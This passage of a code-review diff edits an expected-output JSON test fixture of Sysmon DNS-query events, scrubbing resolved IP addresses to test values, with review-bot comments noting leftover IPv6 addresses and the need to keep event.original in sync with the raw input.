(x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 
UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -4051,7 +4051,7 @@ "event_data": { "QueryName": "pixel.adsafeprotected.com", "QueryStatus": "0", - "QueryResults": "type: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.894", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
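Review bot: The `pixel.adsafeprotected.com` answer rewrites the IPv4 gTLD-server addresses (`192.5.6.30`, `192.33.14.30`, `192.26.92.30`, `192.31.80.30`, `192.12.94.30`) to RFC 1918 `192.168.x.30`, but their IPv6 counterparts `2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30` and `2001:500:856e::30` are left as real public addresses, so whatever motivated the IPv4 rewrite — presumably geo lookups that miss the test database — still applies to the IPv6 entries and this fixture keeps pointing at live infrastructure. Rewriting them to ULA space to mirror the RFC 1918 choice (e.g. `fd00::503:a83e:2:30`) or to the supported IPv6 test block makes the scrub complete; the same leftover IPv6 entries appear in the `ml314.com` record in the last hunk. The `winlog.event_data.QueryResults` copy under `@@ -4051` must be updated in step with `event.original`.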
@@ -4070,7 +4070,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
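Review bot: The added `event.original` line now carries the rewritten addresses, which is only correct if the input event for this test was changed identically, because `event.original` is expected to be the raw input event and pipeline tests compare it byte for byte; the companion input-log change is not visible in this diff, so that should be confirmed. The safer way to keep the two in sync is to change only the input file and regenerate this expected file with the package test tooling rather than editing the expected JSON by hand. Note also that the three distinct answers on the removed line (`::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59`) became three identical `::ffff:89.160.20.156` entries, so any resolved-IP list derived from this field for the same event (outside this hunk) may now be affected by de-duplication in the pipeline and should be checked.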
@@ -4082,7 +4082,7 @@
 "level": "information",
 "event_data": {
 "QueryStatus": "0",
- "QueryResults": "::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.894",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -4112,7 +4112,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" 
@@ -4126,7 +4126,7 @@
 "ProcessId": "2736",
 "QueryName": "aa.agkn.com",
 "QueryStatus": "0",
- "QueryResults": "::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;",
+ "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.902",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4155,7 +4155,7 @@
 "ProcessId": "2736",
 "QueryName": "s0.2mdn.net",
 "QueryStatus": "0",
- "QueryResults": "type: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.911",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4185,7 +4185,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -4196,7 +4196,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4225,7 +4225,7 @@
 "ProcessId": "2736",
 "QueryName": "b.scorecardresearch.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;",
+ "QueryResults": "type: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.911",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4250,7 +4250,7 @@
 "ProcessId": "2736",
 "QueryName": "edw.edmunds.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;",
+ "QueryResults": "type: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:03.921",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4268,7 +4268,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4280,7 +4280,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
